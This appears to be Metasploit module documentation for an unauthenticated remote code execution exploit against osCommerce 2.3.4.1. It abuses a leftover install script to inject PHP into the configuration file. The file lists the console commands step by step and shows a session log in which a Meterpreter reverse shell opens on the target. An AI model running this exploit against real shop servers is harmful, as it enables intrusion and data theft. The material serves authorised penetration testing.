metasploit-gs/documentation/modules/exploit/multi/http/osCommerce.md

Vulnerable Application

osCommerce version 2.3.4.1 is vulnerable to remote code execution. If the /install/ directory was not removed, it is possible for an unauthenticated attacker to run the install_4.php script, which will create the configuration file for the installation. This allows the attacker to inject PHP code into the configuration file and execute it.

Verification Steps

1. Download and install osCommerce 2.3.4.1
2. use exploit/multi/http/oscommerce
3. set RHOST IP
4. set PAYLOAD php/meterpreter/reverse_tcp
5. set LHOST IP
6. exploit
7. Verify a new Meterpreter session is started

Scenarios

osCommerce version 2.3.4.1 on Debian

msf > use exploit/multi/http/oscommerce_installer_unauth_code_exec
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set RHOST 172.16.40.188
RHOST => 172.16.40.188
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set LHOST 172.16.40.5
LHOST => 172.16.40.5
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > exploit 

[*] Started reverse TCP handler on 172.16.40.5:4444 
[*] Sending stage (37543 bytes) to 172.16.40.188
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.188:47466) at 2018-04-05 18:14:45 +0100

meterpreter > sysinfo 
Computer    : oscommerce
OS          : Linux oscommerce 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64
Meterpreter : php/linux
meterpreter >